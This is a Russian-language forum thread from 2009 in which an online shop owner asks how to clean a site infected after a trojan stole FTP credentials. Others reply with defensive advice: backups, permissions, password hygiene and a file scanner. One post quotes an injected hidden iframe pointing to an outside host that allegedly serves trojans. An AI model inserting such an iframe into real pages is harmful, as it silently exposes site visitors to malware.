Как убрать чужой код

Тема в разделе "Shop-script", создана пользователем Fars, 7 июл 2009.

Статус темы:
Закрыта.
Модераторы: kadurinho
  1. Fars

    Fars

    Регистр.:
    26 июн 2009
    Сообщения:
    347
    Симпатии:
    32
    Украли пароль от фтп и залили сапу на сайт - инет-магаз в Shop script premium. Комп почистил, были троянцы. На сервере чищу руками - убрал шеллы, и файлы сапы, но опять заливают посторонние файлы. Пароли менял, комп проверил весь - наверное, остались коды посторонние в скрипте.

    Как почистить скрипт? Только переставлять?
     
  2. xXrum

    xXrum Писатель

    Регистр.:
    29 июн 2009
    Сообщения:
    5
    Симпатии:
    1
    права на папку куда заливают не пробовал менять? Как я знаю для сапы права 777 и туда сапа сама заливает свои файлы при индексации
     
  3. NhGXkv85PR

    NhGXkv85PR

    Регистр.:
    20 дек 2007
    Сообщения:
    166
    Симпатии:
    25
    проще всего восстановить из резервной копии все - той что до взлома сделана была (ну если была конечно сделана) И быстро и думать не надо.
     
  4. Fars

    Fars

    Регистр.:
    26 июн 2009
    Сообщения:
    347
    Симпатии:
    32
    Ссылки-то ладно, понятно, как заливают - вопрос в том, как найти код, который эти ссылки мне в страницы вставляет.
    Взломали давно, резерва чистого целикового нет.. Походу придется заново ставить.
     
  5. dimvin

    dimvin Писатель

    Регистр.:
    6 июл 2009
    Сообщения:
    8
    Симпатии:
    0
    просто перезалить из исходника не поможет - опять сломают. Если заливали сапу - то быстро обнаружат, что перестал работать их код и придут снова. Это эпидемия сейчас. Нужно латать дыры - и бэкапить код, базу и изображения товаров.
     
  6. Дмитрий Кесаев

    Дмитрий Кесаев aka Zlobniy Babko

    Заблокирован
    Регистр.:
    10 май 2007
    Сообщения:
    1.332
    Симпатии:
    1.266
    Обращайся к Фоминсе (fominsa), он поможет!
     
  7. SSSonar

    SSSonar Создатель

    Регистр.:
    11 янв 2009
    Сообщения:
    43
    Симпатии:
    1
    У меня такой же трабл.

    1.Как меняю. В командере ставлю сортировку по дате и смотрю последние изменённые, естестно только их с локалки и перезаписываю на сервер.
    2. После того как поработал с магазом на сервере, меняю пароль на FTP.
    3. Теперь делаю проще. Захожу в ini файл командера и тупо удаляю логи (зашифрованные пароли только, естестно).
    4. Чищу системные папки винды антивирем. Как спастись от трояна не знаю. Фаервол его не палит, каким образом попадает в комп, тоже не известно. Но раз в неделю после чистки прописывает зловредный код на серваке, тыря пароль с командера на ftp. Поентому вижу только 2 варианта. Менять пароль ftp сразу после его посещения. Либо чистить логи командера...
     
  8. Atec

    Atec

    Регистр.:
    28 апр 2007
    Сообщения:
    296
    Симпатии:
    31
    А не пользоваться командером, а скажем filezilla не пробовали? Что все к этому командеру поприлипали, тупой софт в плане использования FTP...
     
  9. VLDM

    VLDM Постоялец

    Регистр.:
    15 июн 2006
    Сообщения:
    50
    Симпатии:
    6
    А если на хостинге сделать простой сканер своих файлов и поставить его в cron как только обнаруживается чужой файл его автоматом удалять.
     
  10. SSSonar

    SSSonar Создатель

    Регистр.:
    11 янв 2009
    Сообщения:
    43
    Симпатии:
    1
    с командером давно работаю... Удобней проги для работы с файловой системы не знаю. А что касается FTP, так тоже не вижу проблем - залить, слить...Дерево каталогов прекрасно видно...в принципе больше ничего не надо...

    Добавлено через 5 минут
    а чужие файлы и не записываются...Троянец прописывает в моих файлах(во всех home.*, index.*) зловредный код, ведущий на другие сайты с троянцами.

    один из примеров кода:
    <body><iframe src="http://b7p.ru:8080/index.php" width=114 height=111 style="visibility: hidden"></iframe>
     
Статус темы:
Закрыта.